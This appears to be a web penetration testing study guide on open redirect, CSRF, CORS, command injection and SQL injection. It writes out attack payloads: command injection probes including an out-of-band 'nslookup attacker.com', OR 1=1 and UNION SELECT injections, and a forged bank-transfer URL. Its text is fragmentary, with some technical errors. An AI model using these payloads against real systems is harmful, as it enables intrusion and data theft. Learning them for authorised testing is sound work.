Web penetration testing guide
Open Redirect Vulnerability
Open Redirect means when a website redirects user to some other website or domain for a particular task.Vulnerability occurs when we put no checks on the redirect parameter so the victim can be redirected to any website and it will still look valid. For example in this case
redirect_to is the parameter to look for.
A CSRF Attack occurs when a attacker uses HTTP request to get a users information and then use that information to act on the users behalf. For example if a user clicks on a malicious link that leads to a HTTP get request to his already logged in bank account leading to money transfer from his account to the attackers account.The way malicious link exploits his bank depends on whether the banking site accepts
httponly attributes tell the browser how the cookies should be sent and read.If a cookie contains
secure attribute browsers will only sent this cookie with HTTPS connections. The
httponly attribute tells the browser that the cookie can only be read through HTTP and HTTPS requests.If a cookie is
If the site accepts the
GET requests then the link will contain a hidden form or an
<img> tag.When the
<img> tag is rendered by the browser it will make the HTTP
GET request to the
src tag. So, if the malicious site were to use a URL that transferred $500 from Bob to Joe that looked like:
https://www.bank.com/transfer?from=bob&to=joe&amount=500 then a malicious image tag would use this URL as its source value, like in the following tag:
The simplistic thing we can do is change the
content-type header to
plain/text;charset=UFT-8.This will allow attacker to submit a HTML to target site without victim becoming aware.
Websites use CSRF token to protect against these attacks.The websites generates two tokens, one is given to the users browser and the other one is kept by the website.Both can be compared when needed to.
A CSRF attack is possible if
- A attacker wants to make a privileged action i.e. changing password of a victim
- If a website only relies on cookie based session handling for authentication.
- There are no unpredictable parameters(in the url) involved i.e. those which cannot be guessed.
CSRF tokens are unique and unpredictable value generated by the server which is given to the client to include it in future requests to prevent CSRF attacks.
- Server sends client a token
- Client submits the form with token
- The server rejects the request if the token is invalid
This is the mechanism through which browser decides whether to share resources with another (different) domain or not.It is a HTTP header. CORS is a security mechanism that allows a web page from one domain or Origin to access a resource with a different domain (a cross-domain request).
Access-Control-Allow-Origin header in the HTTP protocol indicates what kind of domains are allowed to access a certain resource.
It is important to understand CORS before working on CSRF.
SameSite cookie is another mechanism which is used to prevent csrf attacks.The samesite attribute is added in the
set-cookie response header ; the attribute can be given two values :
Lax.If the value is strict then the browser will not include cookie in the request that originates from some other site.
Command injection as known as shell injection occurs when a user input leads to commands being executed on the server side.Attacker is able to execute commands like
ifconfig depending on the type of system the website is hosted.
Note that in order to find the command injection vulnerability we have to check every possible parameter in a particular url
Blind injection occurs when the commands are executed on the system but there is no output given to the end user.
- To detect this type of vulnerability we can us the following
& ping -c 10 [target ip] &causing the website to continuously ping the ip address which in most cases is its loop back interface.
- Another way to detect blind injection is by redirecting the output. For example
& whoami > /var/www/static/whoami.txt &After this we can redirect our browser to confirm that output.
- Another way to detect this type of vulnerability is by using out-of-band technique which means we will input a command which will trigger a network interaction of the web server with the machine we own. For example
& nslookup attacker.com
SQL injection attack is when an attacker is able to compromise a website or server through SQL queries.These can lead to sensitive data exposure.
There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:
1=1 is always true so this payload will return all the product categories.
We can retrieve hidden data by changing a url which in return will change SQL query on the back end resulting in data leakage.For example
GET /filter?category=Gifts'+OR+1=1-- HTTP/1.1 returning all the available categories as we are using the
OR 1=1 which means categories will always return true leading to leakage of all categories.
Suppose we use the
administrator'-- payload in the the login user name so as a result the application will ignore the password field.
SQL union attacks involve tempering with the queries that are returned in application responses as a result we get SQL tables.This is done by using the
UNION keyword which allows us to execute additional
select queries along with the original one. For a
UNION query to work, two key requirements must be met:
- The individual queries must return the same number of columns.
- The data types in each column must be compatible between the individual queries.
The query after the
unionshould have same number of column as query coming before. Also the data type of each column should be same with one another.
The first step of such an attack is to determine the number of columns that are being returned by the original query. To do this use
NULL in the injection site
GET /filter?category=Accessories'+UNION+SELECT+NULL,NULL,NULL-- until the server
500 error turns into
200 OK response indicating the application is vulnerable.The reason for using
NULL as the values returned from the injected
SELECT query is that the data types in each column must be compatible between the original and the injected queries. Since
NULL is convertible to every commonly used data type, using
NULL maximizes the chance that the payload will succeed when the column count is correct.
To find which column can hold string data , replace each
NULL with a string to see the response
200 OK. For example
GET /filter?category=Corporate+gifts'+UNION+SELECT+NULL,'rqk60W',NULL-- HTTP/1.1
In case if we know the tables and column names we can use this type of payloads
In blind SQL the results of payload are not returned i.e. there is not query related response from the app.